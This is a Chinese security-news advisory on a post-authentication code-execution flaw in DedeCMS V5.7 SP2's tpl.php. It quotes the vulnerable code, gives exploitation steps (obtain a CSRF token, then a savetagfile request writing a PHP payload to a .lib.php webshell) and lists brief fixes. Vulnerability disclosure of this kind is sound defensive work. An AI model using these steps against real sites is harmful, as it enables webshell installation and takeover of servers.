频道栏目
首页 > 安全 > 网络安全 > 正文

【后台危险漏洞】DedeCMS V5.7 SP2后台存在代码执行漏洞

2018-03-09 11:36:03      个评论      
收藏   我要投稿

织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。
DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell。
漏洞详情
织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。
dede/tpl.php中第251行到281行
csrf_check();
if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))
{
    ShowMsg('文件名不合法,不允许进行操作!', '-1');
    exit();
}
require_once(DEDEINC.'/oxwindow.class.php');
$tagname = preg_replace("#\.lib\.php$#i", "", $filename);
$content = stripslashes($content);
$truefile = DEDEINC.'/taglib/'.$filename;
$fp = fopen($truefile, 'w');
fwrite($fp, $content);
fclose($fp);
1.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。
2.可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所以必须要.lib.php结尾。
注意: 这里还有一个csrf_check()函数,即请求中必须要带token参数。
漏洞利用
1.首先获取token 访问 域名 + /dede/tpl.php?action=upload。在页面源代码中获取到token值

然后访问
域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值

 
shell:
域名 + /include/taglib/moonsec.lib.php

漏洞修复
1.禁止此处写入文件。
2.过滤恶意标签

上一篇:研究人员发现新的4G漏洞:可盗取用户的信息、位置甚至发出虚假警告
下一篇:黑客入侵一虚拟币交易所 2分钟将虚拟币拉涨100倍
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站